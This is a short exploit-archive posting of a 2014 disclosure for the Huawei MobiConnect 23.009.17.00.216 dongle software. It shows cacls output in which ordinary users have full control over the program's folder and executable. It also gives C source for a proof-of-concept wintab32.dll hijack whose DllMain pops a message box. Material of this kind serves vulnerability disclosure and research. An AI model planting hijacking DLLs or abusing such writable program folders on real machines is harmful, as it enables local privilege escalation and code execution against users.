Home / exploitsPDF  

MobiConnect 23.009.17.00.216 Privilege Escalation / DLL Hijacking

Posted on 01 January 2015

/*
* Exploit Title: MobiConnect 23.009.17.00.216 HUAWEI Insecure Permissions Local Privilege Escalation & DLL Hijacking Exploit (wintab32.dll)
* Date: 25/12/2014
* Author: Hadji Samir s-dz@hotmail.fr
* Vendor Homepage: http://www.mobilis.dz/entreprises/mobiconnect.php
* Vendor: http://www.huawei.com/
* Tested on: windows 7 FR

##################### Insecure Permissions Local Privilege Escalation ####################
C:Program Files>cacls "MobiConnect"
C:Program FilesMobiConnect BUILTINUtilisateurs:(OI)(IO)F
 BUILTINUtilisateurs:(CI)F
 NT SERVICETrustedInstaller:(ID)F
 NT SERVICETrustedInstaller:(CI)(IO)(ID)F
 AUTORITE NTSystème:(ID)F
 AUTORITE NTSystème:(OI)(CI)(IO)(ID)F
 BUILTINAdministrateurs:(ID)F
 BUILTINAdministrateurs:(OI)(CI)(IO)(ID)F
 CREATEUR PROPRIETAIRE:(OI)(CI)(IO)(ID)F
C:Program FilesMobiConnect>cacls "MobiConnect.exe"
C:Program FilesMobiConnectMobiConnect.exe BUILTINUtilisateurs:F
 AUTORITE NTSystème:(ID)F
 BUILTINAdministrateurs:(ID)F

########################DLL Hijacking Exploit (wintab32.dll)#########################

*/

#include <windows.h>

BOOL WINAPI DllMain (
 HANDLE hinstDLL,
 DWORD fdwReason,
 LPVOID lpvReserved)
{
 switch (fdwReason)
 {
 case DLL_PROCESS_ATTACH:
 owned();
 case DLL_THREAD_ATTACH:
 case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
 break;
 }
 return TRUE;
}

int owned() {
 MessageBox(0, "MobiConnect DLL HijackedHadji Samir", "POC", MB_OK);
}

 

TOP

Malware :

Exploits :